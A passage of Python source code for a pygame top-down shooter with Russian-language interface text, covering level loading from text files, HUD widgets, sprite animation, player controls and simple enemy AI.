        self.tiles_group = pygame.sprite.Group()  # floor tile sprites
        self.items_group = pygame.sprite.Group()  # item sprites
        self.transitional_portal_group = pygame.sprite.Group()  # exit portal sprite
        self.bullets_group = pygame.sprite.Group()  # projectile sprites
        self.player = None  # the player; created later in new_game()
        self.clock = pygame.time.Clock()  # game clock (tick source)
        self.camera = Camera(self)  # camera that follows the player

    def update(self):
        '''Advances the game state by one frame.'''
        tick = self.clock.tick()  # milliseconds elapsed since the last frame
        if self.pause_status is True:
            return
        if self.is_finished is True:
            return
        self.all_sprites.update(tick)  # update every game object
        self.update_interface()  # refresh the HUD
        # re-centre the camera on the player and shift every sprite accordingly
        self.camera.update(self.player)
        for sprite in self.all_sprites:
            self.camera.apply(sprite)

    def update_interface(self):
        '''Refreshes the battle HUD (weapon slots, bars and labels).'''
        # current weapon slot (punkt #8)
        cur_weapon_punkt = self.get_punkt(8)
        cur_weapon = self.player.things['cur_weapon']
        if cur_weapon is not None:
            image_cur_weapon = pygame.Surface(size=cur_weapon_punkt.get_size())
            pygame.draw.rect(image_cur_weapon, pygame.color.Color('green'), (0, 0, *cur_weapon_punkt.get_size()), 2)
            image_cur_weapon.blit(pygame.transform.scale(
                cur_weapon.icon_image, (image_cur_weapon.get_width(), image_cur_weapon.get_height())), (0, 0))
            cur_weapon_punkt.set_image(image_cur_weapon)
            cur_weapon_punkt.set_text(cur_weapon.weapon_name)
            cur_weapon_punkt.show()
        else:
            cur_weapon_punkt.hide()
        # second weapon slot (punkt #9)
        second_weapon_punkt = self.get_punkt(9)
        second_weapon = self.player.things['second_weapon']
        if second_weapon is not None:
            image_second_weapon = pygame.Surface(size=second_weapon_punkt.get_size())
            pygame.draw.rect(image_second_weapon, pygame.color.Color('gray'), (0, 0, *second_weapon_punkt.get_size()),
                             2)
            image_second_weapon.blit(pygame.transform.scale(
                second_weapon.icon_image, (image_second_weapon.get_width(), image_second_weapon.get_height())), (0, 0))
            second_weapon_punkt.set_image(image_second_weapon)
            second_weapon_punkt.set_text(second_weapon.weapon_name)
            second_weapon_punkt.show()
        else:
            second_weapon_punkt.hide()
        # health bar (punkt #10): bright red over a dark-red background
        health_punkt = self.get_punkt(10)
        image_health = pygame.Surface(size=health_punkt.get_size())
        image_health.fill(pygame.color.Color('#800000'))
        pygame.draw.rect(image_health, pygame.color.Color('#FF0000'),
                         (0, 0, image_health.get_width() * (self.player.health / self.player.max_health),
                          image_health.get_height())) if self.player.health > 0 else None
        health_punkt.set_image(image_health)
        health_punkt.set_text(f'Здоровье: {round(self.player.health)}')
        # shield bar (punkt #11): bright blue over a dark-blue background
        shields_punkt = self.get_punkt(11)
        image_shields = pygame.Surface(size=shields_punkt.get_size())
        image_shields.fill(pygame.color.Color('#000080'))
        pygame.draw.rect(image_shields, pygame.color.Color('#0000FF'),
                         (0, 0, image_shields.get_width() * (self.player.shields / self.player.max_shields),
                          image_shields.get_height())) if self.player.shields > 0 else None
        shields_punkt.set_image(image_shields)
        shields_punkt.set_text(f'Щиты: {round(self.player.shields)}')
        # energy bar (punkt #12): cyan over a teal background
        energy_punkt = self.get_punkt(12)
        image_energy = pygame.Surface(size=energy_punkt.get_size())
        image_energy.fill(pygame.color.Color('#008080'))
        pygame.draw.rect(image_energy, pygame.color.Color('#00FFFF'),
                         (0, 0, image_energy.get_width() * (self.player.energy / self.player.max_energy),
                          image_energy.get_height())) if self.player.energy > 0 else None
        energy_punkt.set_image(image_energy)
        energy_punkt.set_text(f'Энергия: {round(self.player.energy)}')
        # armor readout (punkt #13)
        armor_punkt = self.get_punkt(13)
        armor_punkt.set_text(f'Броня: {round(self.player.armor())}')
        # speed readout (punkt #14)
        sprint_punkt = self.get_punkt(14)
        sprint_punkt.set_text(f'Скорость: {round(self.player.sprint_speed(), 1)}')
        # level-number label (punkt #15)
        label_level = self.get_punkt(15)
        label_level.set_text(f'Уровень {label_level.number_level}')

    def render(self, screen):
        '''Draws the game space onto screen, back to front.'''
        self.tiles_group.draw(screen)
        self.walls_group.draw(screen)
        self.transitional_portal_group.draw(screen)
        self.items_group.draw(screen)
        self.player_group.draw(screen)
        self.enemies_group.draw(screen)
        self.bullets_group.draw(screen)
        for punkt in self.punkts:
            punkt.draw(screen, ispressed=punkt.get_focused(pygame.mouse.get_pos()))

    def add_punkt(self, punkt):
        '''Adds a single punkt (HUD widget).'''
        self.punkts.append(punkt)

    def add_punkts(self, *punkts):
        '''Adds several punkts at once.'''
        self.punkts += list(punkts)

    def get_punkt(self, number):
        '''Returns the punkt with the given number (None when absent).'''
        for punkt in self.punkts:
            if punkt.number == number:
                return punkt

    def check_on_press_punkts(self, pos):
        '''Forwards a click at pos to the punkts; True if one handled it.'''
        for punkt in self.punkts:
            if punkt.on_click(pos):
                return True
        return False

    def new_game(self):
        '''Resets all previous progress and starts a fresh game.'''
        print(f'{self.__class__}.new_game()') if DEBUG_INFO else None
        self.levels.clear()
        self.load_levels(self.game.data_settings["package"])
        self.player = Player(self, 0, 0)
        # wire the player's actions and stats to the HUD punkts:
        cur_weapon_punkt = self.get_punkt(8)  # current weapon slot
        cur_weapon_punkt.connect(self.player.change_weapons)
        second_weapon_punkt = self.get_punkt(9)  # second weapon slot
        second_weapon_punkt.connect(self.player.change_weapons)
        self.get_punkt(15).number_level = 0  # level-number label
        self.get_punkt(16).hide()
        self.update_interface()  # refresh the HUD
        self.generate_level(self.get_next_level())

    def finish_game(self, message=None, color=None):
        '''Ends the game, optionally showing a coloured message (punkt #16).'''
        print(f'{self.__class__}.finish_game()') if DEBUG_INFO else None
        self.pause_status = True
        label_message = self.get_punkt(16)
        label_message.show()
        if message:
            label_message.set_text(message)
        if color:
            label_message.set_color(color_text=color)

    def get_next_level(self):
        '''Pops and returns the next queued level (None when exhausted).'''
        try:
            self.get_punkt(15).number_level += 1
            return self.levels.pop(0)
        except IndexError:
            return None

    def generate_level(self, level):
        """Builds all game objects for the given level map."""
        print('\tStart generate level') if DEBUG_INFO else None
        if level is None:
            # no more levels: the game ends with a victory
            return self.finish_game(message='Ты выйграл', color=pygame.color.Color('green'))
        # show the menu background while the level is loading
        self.game.main_screen.fill((0, 0, 0))
        self.game.main_screen.blit(self.game.menu.image_background, (0, 0))
        pygame.display.flip()
        self.empty_sprites()  # drop every sprite of the previous level
        for y in range(len(level)):
            for x in range(len(level[y])):
                obj = level[y][x]
                if obj != '_' and obj != '#':
                    Tile(self, x, y)
                if obj == '#':
                    Wall(self, x, y)
                if obj == 'e':
                    Enemy(self, x, y)
                if obj == 'E':
                    TransitionalPortal(self, x, y)
                if obj == 'T':
                    choice(StdItems.all_items)(self, x, y)
                if obj == 'W':
                    choice(StdItems.all_weapons)(self, x, y)
                if obj == 'A':
                    choice(StdItems.all_armors)(self, x, y)
                if obj == '@':
                    self.player.set_pos(x, y)
                    self.player.add(self.player_group, self.all_sprites)
        # re-register the items the player already carries
        for elem in self.player.things.values():
            if elem is not None:
                elem.add(self.all_sprites, self.items_group)
        print('\tFinish generate level') if DEBUG_INFO else None

    def load_levels(self, directory):
        '''Loads a package of level files (lvl_1.txt, lvl_2.txt, ...).'''
        print('GameSpace.load_levels()') if DEBUG_INFO else None
        print(f'\tStart load levels {directory}') if DEBUG_INFO else None
        self.levels.clear()
        for i in range(1, 10 ** 10):
            print(f'\t\t--- connect level lvl_{i} ', end='') if DEBUG_INFO else None
            filename = f"data/levels/{directory}/lvl_{i}.txt"
            # read the level, stripping newline characters;
            # stop at the first missing file
            if not os.access(filename, os.F_OK):
                break
            with open(filename, 'r') as mapFile:
                level_map = [line.strip().split() for line in mapFile]
            # compute the maximum row width
            max_width = max(map(len, level_map))
            # pad every row with empty cells ('_') up to the maximum width
            self.levels.append(list(map(lambda x: x + ['_'] * (max_width - len(x)), level_map)))
            print('True') if DEBUG_INFO else None
        print('False') if DEBUG_INFO else None
        print(f'\tFinish load levels {directory}') if DEBUG_INFO else None
        [print([print(row) for row in level]) for level in self.levels] if DEBUG_INFO else None

    def empty_sprites(self):
        """Removes every sprite from every group."""
        print('GameSpace.empty_sprites()') if DEBUG_INFO else None
        self.all_sprites.empty()
        self.walls_group.empty()
        self.items_group.empty()
        self.enemies_group.empty()
        self.tiles_group.empty()
        self.player_group.empty()
        self.transitional_portal_group.empty()
        self.bullets_group.empty()
class Punkt:
    '''
    A HUD widget (similar to PushButton / Label from the PyQt5 library):
    a rectangle with optional background, image, caption and click handler.
    '''

    def __init__(self, size, text=None, pos=(0, 0), font=None, color=(100, 100, 100), show_background=True,
                 color_active=(0, 255, 255), color_text=(0, 0, 0), func=None, number=0, bolden=True):
        '''Creates the widget; size == -1 shrinks it to fit the caption.'''
        print(f'\t\tinit punct text: "{text}"", number: "{number}" : ', end='') if DEBUG_INFO else None
        # pre-declare every attribute before the setters below fill them in
        self.text = self.font = self.func = self.color = self.color_text = self.color_active = self.bolden = None
        self.number = self.pos = self.x = self.y = self.width = self.height = self.size = self.image = None
        self.isshowed = None
        self.set_text(text)  # caption
        self.set_font(font)  # font
        self.connect(func)  # click handler
        self.set_color(color, color_active, color_text)  # element colours
        self.show_background = show_background  # draw a filled background
        self.bolden = bolden  # highlight while the cursor hovers
        self.number = number  # widget id used by get_punkt()
        self.set_pos(*pos)  # position
        # Widget size. When size == -1 the size becomes the smallest
        # one that can display the caption.
        self.resize(self.get_size_text() if size == -1 else size)
        self.set_image(None)  # image overlay
        self.show()  # visible by default
        print('True\n', end='') if DEBUG_INFO else None

    def get_size(self):
        '''Returns the widget size (width, height).'''
        return self.size

    def get_size_text(self):
        '''Returns the pixel size of the caption (measured bold when bolden).'''
        self.font.set_bold(True) if self.bolden else None
        size = self.font.size(self.text)
        self.font.set_bold(False) if self.bolden else None
        return size

    def get_focused(self, pos):
        '''Returns True when pos lies inside the widget, else False.'''
        if not self.x <= pos[0] <= self.x + self.width:
            return False
        if not self.y <= pos[1] <= self.y + self.height:
            return False
        return True

    def set_text(self, text):
        '''Sets the caption.'''
        self.text = text

    def set_font(self, font):
        '''Sets the font (default pygame font of size 16 when None).'''
        self.font = pygame.font.Font(None, 16) if font is None else font

    def set_image(self, image):
        '''Sets the image overlay (None for no image).'''
        self.image = image

    def set_color(self, color=None, color_active=None, color_text=None):
        '''Sets the element colours; None keeps the current value.'''
        if color is not None:
            # idle background colour
            self.color = color
        if color_active is not None:
            # hovered background colour
            self.color_active = color_active
        if color_text is not None:
            # caption colour
            self.color_text = color_text

    def set_pos(self, x, y):
        '''Sets the widget position.'''
        self.pos = self.x, self.y = x, y

    def resize(self, size):
        '''Sets the widget size.'''
        self.size = self.width, self.height = size

    def show(self):
        '''Makes the widget visible.'''
        self.isshowed = True

    def hide(self):
        '''Hides the widget.'''
        self.isshowed = False

    def connect(self, func):
        '''Attaches the click handler.'''
        self.func = func

    def draw(self, screen, ispressed=False):
        '''Draws the widget onto screen; ispressed highlights it.'''
        if not self.isshowed:
            # hidden widgets are not drawn
            return
        surface = pygame.Surface(size=self.get_size())
        if self.show_background:  # fill the background
            color_background = self.color if not ispressed or not self.bolden else self.color_active
            surface.fill(color_background)
        else:  # make the background transparent
            surface.fill((1, 0, 0))
            surface.set_colorkey((1, 0, 0))
        if self.image is not None:  # blit the image overlay when present
            surface.blit(self.image, (0, 0))
        if self.text is not None:  # render the caption when present
            if not ispressed or not self.bolden:
                # plain caption surface
                text = self.font.render(self.text, 1, self.color_text)
            else:
                # bold (highlighted) caption surface
                self.font.set_bold(True)
                text = self.font.render(self.text, 1, self.color_text)
                self.font.set_bold(False)
            # centre the caption inside the widget
            text_x = self.width // 2 - text.get_width() // 2
            text_y = self.height // 2 - text.get_height() // 2
            # blit the caption
            surface.blit(text, (text_x, text_y))
        # blit the assembled widget image onto the screen
        screen.blit(surface, self.pos)

    def on_click(self, pos):
        '''Invokes the attached handler when the click at pos hits the widget.'''
        if self.func is None:
            return False
        if not self.get_focused(pos):
            return False
        if not self.isshowed:
            return False
        self.func()
        return True
class AnimatedPunkt:
    """
    Animated punkt: container for the nested animation sprite classes.
    """

    class AnimateBase(pygame.sprite.Sprite):
        """
        Base class for punkt animations: a plain surface at (x, y).
        """

        def __init__(self, x, y, size, *groups):
            """Creates the animation surface and its rect."""
            super().__init__(*groups)
            self.image = pygame.Surface(size=size)
            self.rect = self.image.get_rect().move(x, y)

    class Blinking(AnimateBase):
        """
        Blinking animation: the surface alpha oscillates between bounds.
        """

        def __init__(self, x, y, size, *groups, var=1):
            """Initialises the alpha bounds, speed and blink variant."""
            super().__init__(x, y, size, *groups)
            self.min_alpha = 1
            self.max_alpha = 20
            self.cur_alpha = (self.max_alpha - self.min_alpha) / 2 + self.min_alpha
            self.v = 20  # alpha change speed (units per second)
            self.var = var  # blink variant: 1 steady fade, 2 jittery
            self.k = 1  # current direction of the alpha change

        def update(self, *args, **kwargs):
            """Advances the alpha by the elapsed time args[0] (milliseconds)."""
            if self.var == 1:  # variant 1: steady back-and-forth fade
                self.cur_alpha += args[0] * self.v / 1000 * self.k
                if not self.min_alpha <= self.cur_alpha <= self.max_alpha:
                    self.k = -self.k
                    if self.k == 1:
                        self.cur_alpha = self.min_alpha
                    else:
                        self.cur_alpha = self.max_alpha
            if self.var == 2:  # variant 2: direction is re-randomised every tick
                self.k = (-1) ** randint(2, 3)
                self.cur_alpha += args[0] * self.v / 1000 * self.k
                if not self.min_alpha <= self.cur_alpha <= self.max_alpha:
                    self.k = -self.k
                    if self.k == 1:
                        self.cur_alpha = self.min_alpha
                    else:
                        self.cur_alpha = self.max_alpha
            if self.cur_alpha:
                self.image.set_alpha(int(self.cur_alpha))

    class Frames(AnimateBase):
        """
        Frame-by-frame animation cut from a sprite sheet.
        """

        def __init__(self, x, y, size, sheet, column, rows, *groups):
            """Cuts the sheet into frames and starts at frame 0."""
            super().__init__(x, y, size, *groups)
            # BUG FIX: update() advances self.cur_frame_run, but this attribute
            # used to be initialised under the name self.cur_frame_index,
            # raising AttributeError on the first update() call.
            self.cur_frame_run = 0
            self.frames_run = self.cut_sheet(sheet, column, rows)

        def cut_sheet(self, sheet, columns, rows):
            '''Splits the animation sheet and returns the list of frames.'''
            listen = []
            self.rect = pygame.Rect(self.rect.x, self.rect.y, sheet.get_width() // columns,
                                    sheet.get_height() // rows)
            for j in range(rows):
                for i in range(columns):
                    frame_location = (self.rect.w * i, self.rect.h * j)
                    listen.append(sheet.subsurface(pygame.Rect(
                        frame_location, self.rect.size)))
            return listen

        def update(self, *args, **kwargs):
            """Advances the current frame by elapsed time args[0] (ms) scaled by args[3]."""
            self.cur_frame_run = (self.cur_frame_run + 5.7 * args[0] / 1000 * args[3] *
                                  len(self.frames_run) / 10) % len(self.frames_run)
            self.image = self.frames_run[int(self.cur_frame_run)]
class AnimatedSpriteForHero(object):
    '''Mixin adding a sprite-sheet run animation to a hero sprite.'''

    def init_animation(self, sheet, columns, rows):
        # idle image of the character
        self.std_image = self.image
        # list of frames for the run animation
        self.frames_run = self.cut_sheet(sheet, columns, rows)
        # current (fractional) frame index
        self.cur_frame_run = 0
        # facing direction as [kx, ky]
        self.sight = [0, 0]

    def cut_sheet(self, sheet, columns, rows):
        '''Splits the animation sheet and returns the list of frames.'''
        listen = []
        self.rect = pygame.Rect(self.rect.x, self.rect.y, sheet.get_width() // columns,
                                sheet.get_height() // rows)
        for j in range(rows):
            for i in range(columns):
                frame_location = (self.rect.w * i, self.rect.h * j)
                listen.append(sheet.subsurface(pygame.Rect(
                    frame_location, self.rect.size)))
        return listen

    def update_animation(self, *args):
        '''Advances the run animation.

        args: (tick_ms, move_kx, move_ky, speed); kx/ky are -1, 0 or 1.
        Frames are mirrored horizontally when the hero faces left.
        '''
        if args[1] == 1 or (args[1] == 0 and args[2] == 1):
            self.sight = [args[1], args[2]]
            self.cur_frame_run = (self.cur_frame_run + 5.7 * args[0] / 1000 * args[3] *
                                  len(self.frames_run) / 10) % len(self.frames_run)
            self.image = self.frames_run[int(self.cur_frame_run)]
        elif args[1] == -1 or (args[1] == 0 and args[2] == -1):
            self.sight = [args[1], args[2]]
            self.cur_frame_run = (self.cur_frame_run + 5.7 * args[0] / 1000 * args[3] *
                                  len(self.frames_run) / 10) % len(self.frames_run)
            self.image = pygame.transform.flip(self.frames_run[int(self.cur_frame_run)], True, False)
        else:
            # standing still: fall back to the idle image, keeping the last facing
            self.cur_frame_run = 0
            self.image = self.std_image if self.sight[0] != -1 else pygame.transform.flip(self.std_image, True, False)
class GameObject(pygame.sprite.Sprite):
    '''Base sprite for everything placed on the level grid.'''

    def __init__(self, space, x, y):
        """Creates the sprite at grid cell (x, y) of the given game space."""
        super().__init__(space.all_sprites)
        self.gamespace = space
        cell = space.size_cell
        placeholder = pygame.Surface(size=(cell, cell))
        placeholder.fill(pygame.color.Color('purple'))
        self.image = placeholder
        self.true_x = cell * x
        self.true_y = cell * y
        self.rect = self.image.get_rect().move(self.true_x, self.true_y)
        if DEBUG_INFO:
            print(f'create {self.__class__.__name__}(x={x}; y={y})')

    def set_image(self, image):
        '''Scales image to the sprite rect and installs it.'''
        self.image = pygame.transform.scale(image, (self.rect.width, self.rect.height))

    def set_pos(self, x, y):
        '''Places the sprite at grid cell (x, y).'''
        if DEBUG_INFO:
            print(f'{self.__class__}.set_pos(x={x}, y={y})')
        cell = self.gamespace.size_cell
        self.rect.x, self.rect.y = self.true_x, self.true_y = (cell * x, cell * y)

    def set_coordinates(self, x, y):
        """Places the sprite at pixel coordinates (x, y)."""
        self.rect.x, self.rect.y = self.true_x, self.true_y = x, y
class BaseHero(GameObject):
    '''
    Base class for characters (player and enemies): stats, inventory,
    attacking, damage handling and wall-aware movement.
    '''

    def __init__(self, space, x, y):
        """Creates the hero at grid cell (x, y) with default stats."""
        super().__init__(space, x, y)
        # pick-up radius for items
        self.take_radius = space.size_cell * 1.046
        # collision mask
        self.mask = pygame.mask.from_surface(self.image)
        # equipment slots of the character
        self.things = {'cur_weapon': None, 'second_weapon': None,
                       'helmet': None, 'vest': None, 'boots': None,
                       'amulet': None}
        self.readiness_recovery_shields = 1  # readiness to regenerate shields (0..1)
        self.readiness_recovery_energy = 1  # readiness to regenerate energy (0..1)
        self.v_recovery_shiels = 10  # shield regeneration speed per second
        self.v_recovery_enegry = 15  # energy regeneration speed per second
        self._armor = 0  # base armor
        self._sprint_speed = 4  # base sprint speed
        self.health = self.max_health = 100  # health
        self.shields = self.max_shields = 100  # shields
        self.energy = self.max_energy = 100  # energy
        print(f'create {self.__class__.__name__}(x={x}, y={y})') if DEBUG_INFO else None

    def draw_health_shields_line(self):
        """Draws a combined health+shields bar onto self.image."""
        line_health_and_shields = pygame.Surface(size=(self.image.get_width() * 2 / 3, 3))
        sum_max_health_and_shields = self.max_health + self.max_shields
        size_line_max_health = (self.max_health / sum_max_health_and_shields * line_health_and_shields.get_width(),
                                line_health_and_shields.get_height())
        size_line_health = (self.health / sum_max_health_and_shields * line_health_and_shields.get_width(),
                            line_health_and_shields.get_height())
        size_line_max_shields = (self.max_shields / sum_max_health_and_shields * line_health_and_shields.get_width(),
                                 line_health_and_shields.get_height())
        size_line_shields = (self.shields / sum_max_health_and_shields * line_health_and_shields.get_width(),
                             line_health_and_shields.get_height())
        pygame.draw.rect(line_health_and_shields, pygame.color.Color('#800000'), (0, 0, *size_line_max_health))
        pygame.draw.rect(line_health_and_shields, pygame.color.Color('#FF0000'), (0, 0, *size_line_health))
        pygame.draw.rect(line_health_and_shields, pygame.color.Color('#000080'),
                         (size_line_max_health[0], 0, *size_line_max_shields)) if self.health > 0 else None
        pygame.draw.rect(line_health_and_shields, pygame.color.Color('#0000FF'),
                         (size_line_max_health[0], 0, *size_line_shields)) if self.shields > 0 else None
        self.image.blit(line_health_and_shields, (self.image.get_width() / 6, 10))

    def attack(self, target):
        '''Attacks with the current weapon; target is a hero or an (x, y) pair.'''
        print(f'{self.__class__.__name__}().attack(target={target})') if DEBUG_INFO else None
        weapon = self.things.get('cur_weapon')
        if weapon is None:
            return
        else:
            if isinstance(target, BaseHero):
                weapon.attack(self, target.rect.x + target.rect.width / 2, target.rect.y + target.rect.height / 2)
            elif isinstance(target, tuple):
                weapon.attack(self, *target)

    def half_damage(self, damage):
        '''Receives damage: armor reduces it, shields absorb it before health.'''
        print(f'{self.__class__}.half_damge(damage={damage}, ', end='') if DEBUG_INFO else None
        damage -= damage * (self.armor() / (self.armor() + 300))  # effective damage after armor
        print(f'true_damage={damage})') if DEBUG_INFO else None
        if self.shields - damage < 0:
            damage -= self.shields
            self.shields = 0
            self.health -= damage
        else:
            self.shields -= damage
        # taking damage restarts the shield-regeneration delay
        self.readiness_recovery_shields = 0

    def change_weapons(self):
        '''Swaps the current and second weapons.'''
        print(f'{self.__class__}.change_weapons()') if DEBUG_INFO else None
        self.things['cur_weapon'], self.things['second_weapon'] = (self.things['second_weapon'],
                                                                   self.things['cur_weapon'])

    def take_thing(self, pos):
        '''Picks up the item at pos; True on success, False otherwise.'''
        print(f'{self.__class__}.take_thing(pos={pos})') if DEBUG_INFO else None
        thing = None
        for elem in self.gamespace.items_group.sprites():
            if elem.rect.collidepoint(pos):
                if not elem.is_taken:
                    thing = elem
                    break
        if thing is None:
            return False
        if not ((self.rect.x - thing.rect.x) ** 2 + (self.rect.y - thing.rect.y) ** 2) ** 0.5 < self.take_radius:
            return False
        if thing.type_item == 'weapon':
            # weapons fill the free slot; otherwise the current one is dropped
            if self.things['cur_weapon'] is None:
                self.things['cur_weapon'] = thing
            elif self.things['second_weapon'] is None:
                self.things['second_weapon'] = thing
            else:
                old_thing = self.things["cur_weapon"]
                self.things['cur_weapon'] = thing
                old_thing.put(self.rect.x, self.rect.y)
        else:
            # any other item replaces the one in its slot (dropping the old one)
            old_thing = self.things.get(thing.type_item)
            if old_thing is not None:
                old_thing.put(self.rect.x, self.rect.y)
            self.things[thing.type_item] = thing
        thing.set_taken()
        return True

    def armor(self):  # total armor: base plus every equipped item's bonus
        return sum(map(lambda key: self.things[key].armor if self.things.get(key) else 0,
                       self.things.keys())) + self._armor

    def sprint_speed(self):  # total sprint speed: base plus item bonuses
        return sum(map(lambda key: self.things[key].sprint_speed if self.things.get(key) else 0,
                       self.things.keys())) + self._sprint_speed

    def get_moving(self, tick):  # pixel displacement for the given tick (ms)
        return tick * self.gamespace.size_cell * self.sprint_speed() / 1000

    def move_up(self, tick):
        """Moves up, stopping flush against any wall hit."""
        self.true_y -= self.get_moving(tick)  # update the true coordinates
        self.rect.y = int(self.true_y)  # update the rect coordinates
        # walls the hero now intersects
        sprite_list = pygame.sprite.spritecollide(self, self.gamespace.walls_group, False)
        if sprite_list:
            # push the hero back to just below the wall
            self.rect.y = self.true_y = sprite_list[0].rect.y + sprite_list[0].rect.size[1]

    def move_down(self, tick):
        """Moves down, stopping flush against any wall hit."""
        self.true_y += self.get_moving(tick)  # update the true coordinates
        self.rect.y = int(self.true_y)  # update the rect coordinates
        # walls the hero now intersects
        sprite_list = pygame.sprite.spritecollide(self, self.gamespace.walls_group, False)
        if sprite_list:
            # push the hero back to just above the wall
            self.rect.y = self.true_y = sprite_list[0].rect.y - self.rect.size[1]

    def move_left(self, tick):
        """Moves left, stopping flush against any wall hit."""
        self.true_x -= self.get_moving(tick)  # update the true coordinates
        self.rect.x = int(self.true_x)  # update the rect coordinates
        # walls the hero now intersects
        sprite_list = pygame.sprite.spritecollide(self, self.gamespace.walls_group, False)
        if sprite_list:
            # push the hero back to just right of the wall
            self.rect.x = self.true_x = sprite_list[0].rect.x + sprite_list[0].rect.size[0]

    def move_right(self, tick):
        """Moves right, stopping flush against any wall hit."""
        self.true_x += self.get_moving(tick)  # update the true coordinates
        self.rect.x = int(self.true_x)  # update the rect coordinates
        # walls the hero now intersects
        sprite_list = pygame.sprite.spritecollide(self, self.gamespace.walls_group, False)
        if sprite_list:
            # push the hero back to just left of the wall
            self.rect.x = self.true_x = sprite_list[0].rect.x - self.rect.size[0]

    def get_distance(self, other):
        '''Returns the distance between self and another such object.'''
        return ((self.true_x - other.true_x) ** 2 + (self.true_y - other.true_y) ** 2) ** 0.5
class Player(BaseHero, AnimatedSpriteForHero):
    '''
    The player character: keyboard-controlled hero with a run animation
    and shield/energy regeneration.
    '''

    def __init__(self, space, x, y):
        """Creates the player at grid cell (x, y) and loads its images."""
        super().__init__(space, x, y)
        # 'player\\std.png': previously written 'player\std.png' with the
        # invalid escape sequence '\s' (SyntaxWarning on modern Python);
        # the string value is unchanged.
        image = pygame.transform.scale(space.game.load_image('player\\std.png', -1),
                                       (space.size_cell, space.size_cell))
        self.set_image(image)
        sheet_animation_run = self.gamespace.game.load_image('player\\animation run 10x1.png', -1)
        sheet_animation_run = pygame.transform.scale(sheet_animation_run, (space.size_cell * 10, space.size_cell * 1))
        self.init_animation(sheet_animation_run, 10, 1)

    def update(self, *args):
        """Handles input, movement, death and regeneration.

        args[0] is the elapsed tick time in milliseconds.
        """
        pressed_keys = pygame.key.get_pressed()  # snapshot of held keys
        move_kx = move_ky = 0  # direction coefficients fed to the animation
        if self.health <= 0:
            # health dropped to 0 or below: remove the sprite, end the game
            self.kill()
            self.gamespace.finish_game(message='Ты проиграл', color=pygame.color.Color('red'))
            return
        if pressed_keys[pygame.K_RIGHT] or pressed_keys[pygame.K_d]:
            # move right on Right/D
            self.move_right(args[0])
            move_kx += 1
        if pressed_keys[pygame.K_LEFT] or pressed_keys[pygame.K_a]:
            # move left on Left/A
            self.move_left(args[0])
            move_kx -= 1
        if pressed_keys[pygame.K_UP] or pressed_keys[pygame.K_w]:
            # move up on Up/W
            self.move_up(args[0])
            move_ky += 1
        if pressed_keys[pygame.K_DOWN] or pressed_keys[pygame.K_s]:
            # move down on Down/S
            self.move_down(args[0])
            move_ky -= 1
        # advance the run animation
        self.update_animation(args[0], move_kx, move_ky, self.sprint_speed())
        # shield regeneration, delayed after taking damage
        if self.readiness_recovery_shields < 1:
            self.readiness_recovery_shields += args[0] / 1000 * (1 / 3)
        else:
            self.shields += self.v_recovery_shiels * args[0] / 1000
            if self.shields > self.max_shields:
                self.shields = self.max_shields
        # energy regeneration, delayed after firing
        if self.readiness_recovery_energy < 1:
            self.readiness_recovery_energy += args[0] / 1000 * 2
        else:
            self.energy += self.v_recovery_enegry * args[0] / 1000
            if self.energy > self.max_energy:
                self.energy = self.max_energy
class Enemy(BaseHero, AnimatedSpriteForHero):
    '''
    Enemy character: a hero driven by a simple range-keeping AI,
    spawned with a random weapon and a random piece of armor.
    '''

    def __init__(self, space, x, y):
        """Creates the enemy at grid cell (x, y) with random equipment."""
        super().__init__(space, x, y)
        # 'enemy\\goblin std2.png': previously written 'enemy\goblin std2.png'
        # with the invalid escape sequence '\g' (SyntaxWarning on modern
        # Python); the string value is unchanged.
        image = pygame.transform.scale(space.game.load_image('enemy\\goblin std2.png', -1),
                                       (space.size_cell, space.size_cell))
        self.set_image(image)
        sheet = pygame.transform.scale(self.gamespace.game.load_image('enemy\\animation run 6x1.png', -1),
                                       (space.size_cell * 6, space.size_cell * 1))
        self.init_animation(sheet, 6, 1)
        self.add(space.enemies_group)
        self.activity = False  # whether the AI is active
        self.r_detection = space.size_cell * 3  # detection radius
        # preferred attack distance band (min, max)
        self.attack_range = (space.size_cell * 1.5, space.size_cell * 2.5)
        # random weapon
        weapon = choice(StdItems.all_weapons)(space, x, y)
        self.things["cur_weapon"] = weapon
        weapon.set_taken()
        # random armor piece
        armor = choice(StdItems.all_armors)(space, x, y)
        self.things[armor.type_item] = armor
        armor.set_taken()

    def ai(self, tick, target):
        """Enemy AI: attack inside the range band, otherwise adjust distance."""
        move_kx = move_ky = 0
        if self.attack_range[0] < self.get_distance(target) < self.attack_range[1]:
            self.attack(target)
        elif not self.attack_range[1] > self.get_distance(target):
            # too far away: close in on the target
            if self.true_x < target.true_x:
                self.move_right(tick)
                move_kx += 1
            if self.true_x > target.true_x:
                self.move_left(tick)
                move_kx -= 1
            if self.true_y < target.true_y:
                self.move_down(tick)
                move_ky -= 1
            if self.true_y > target.true_y:
                self.move_up(tick)
                move_ky += 1
        elif not self.attack_range[0] < self.get_distance(target):
            # too close: back away from the target
            if self.true_x < target.true_x:
                self.move_left(tick)
                move_kx -= 1
            if self.true_x > target.true_x:
                self.move_right(tick)
                move_kx += 1
            if self.true_y > target.true_y:
                self.move_down(tick)
                move_ky -= 1
            if self.true_y < target.true_y:
                self.move_up(tick)
                move_ky += 1
        self.update_animation(tick, move_kx, move_ky, self.sprint_speed())

    def update(self, *args):
        """Updates the enemy: death, AI activation and regeneration."""
        if self.health <= 0:
            # destroy the enemy at 0 health or below
            return self.kill()
        if self.activity:
            # run the AI once active
            self.ai(args[0], self.gamespace.player)
        # otherwise check the activation triggers:
        elif self.get_distance(self.gamespace.player) <= self.r_detection:
            # the player came into view
            self.activity = True
        else:
            for enemy in self.gamespace.enemies_group.sprites():
                # a nearby enemy is already active
                if self.get_distance(enemy) <= self.r_detection and enemy.activity:
                    self.activity = True
                if self.activity:
                    break
            for bullet in self.gamespace.bullets_group.sprites():
                # a projectile came near
                if self.get_distance(bullet) <= self.r_detection:
                    self.activity = True
                if self.activity:
                    break
        # shield regeneration, delayed after taking damage
        if self.readiness_recovery_shields < 1:
            self.readiness_recovery_shields += args[0] / 1000 * (1 / 3)
        else:
            self.shields += self.v_recovery_shiels * args[0] / 1000
            if self.shields > self.max_shields:
                self.shields = self.max_shields
        # energy regeneration, delayed after firing
        # (the old comment mislabelled this as an armor update)
        if self.readiness_recovery_energy < 1:
            self.readiness_recovery_energy += args[0] / 1000 * 2
        else:
            self.energy += self.v_recovery_enegry * args[0] / 1000
            if self.energy > self.max_energy:
                self.energy = self.max_energy
        self.draw_health_shields_line()
class Wall(GameObject):
    '''
    Wall tile: blocks hero movement (collision-checked in BaseHero.move_*).
    '''

